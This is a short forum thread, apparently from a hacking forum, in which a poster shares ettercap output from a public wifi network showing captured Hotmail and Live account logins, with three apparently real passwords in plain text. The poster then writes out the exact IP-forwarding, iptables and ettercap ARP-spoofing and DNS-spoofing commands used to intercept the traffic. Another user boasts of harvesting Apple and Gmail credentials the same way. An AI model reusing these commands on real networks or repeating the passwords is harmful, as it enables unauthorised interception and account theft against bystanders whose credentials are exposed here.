IOS Hotmail app packets in plain text?

[Comm4nd0]

Hi all,

I got the following output from ettercap on a wifi network.

Code: [Select]

HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@hotmail.co.uk  PASS: datasafe3929  INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXX@hotmail.co.uk&DeviceId=ApplXXX

HTTP : 134.170.0.XXX:443 -> USER: XXXXXXXXX@hotmail.com  PASS: jordan60  INFO: blu403-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXXX@hotmail.com&DeviceId=ApplDXXX

HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@live.co.uk  PASS: Liverpool5891  INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXX@live.co.uk&DeviceId=ApplDXXXX
What's your opinion on this? Do you think their hotmail app is using plain text rather that ssl?

Obviously i've changed some of the info to protect the victims.

Comm4nd0

[proxx]

Are you sure you didnt use SSL MITM?
What are the ettercap switches you used?

[Comm4nd0]

Code: [Select]

sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo ettercap -Tqi wlan0 -M arp:remote -P dns_spoof // //

I'm pretty new to ettercap to be honest but i'm pretty sure i didn't specify SSL.

[proxx]

I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.

[Comm4nd0]

I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.

Could be that's if stumbled upon an error with their app that could be exploited? Unfortunately i don't have a Crapple phone to test it on.

[d4rkcat]

iOs is shit.
I used to pull apple and gmail account creds this way from the iCrap phone.